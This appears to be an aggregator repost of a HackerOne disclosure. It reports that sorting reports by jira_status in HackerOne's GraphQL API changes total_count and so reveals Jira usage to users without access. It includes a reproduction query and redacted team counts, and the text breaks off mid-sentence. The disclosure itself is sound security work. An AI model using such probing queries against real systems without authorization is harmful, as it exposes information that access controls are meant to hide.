๐ HackerOne: Graphql: Sorting the reports by jira_status field resulted to different value
๐ก Newskategorie: Sicherheitslรผcken
๐ Quelle: vulners.com
Summary: Sorting the reports by jira_status yield to different result depicting the team is using jira even the user has no access. Description: A user with no access to jira information of any reports can somehow access the jira field using order_by through jira_status Using the 2 graphql below we can see the discrepancies of total_count for the test teams i will mention: Test Teams: 1. โโโโโโโโโ order_by:field:id = total_count: 10 order_by field:jira_status= total_count :11 2. โโโโโโโโโโ : order_by:field:id = total_count: 458 order_by field:jira_status= total_count :466 3. โโโโ order_by:field:id = total_count: 299 order_by field:jira_status= total_count :309 4. โโโ order_by:field:id = total_count: 109 order_by field:jira_status= total_count :110 Graphql Query using field id inorder_by as criteria it will yield same result except for the field of jira_status { reports(where: {team: {handle: {_eq: "โโโโโโ"}}}, order_by: {direction: ASC, field: id}) { total_count nodes { substate jira_escalation_state jira_escalation_last_state_change_at created_at disclosed_at extracted_report_data { hosts } title url team { handle } reporter { username } } } } Please change the field in sort_by tojira_status to display different result. Below is part of the response using jira_status as the field, please notice that jira_escalation_stateand... ...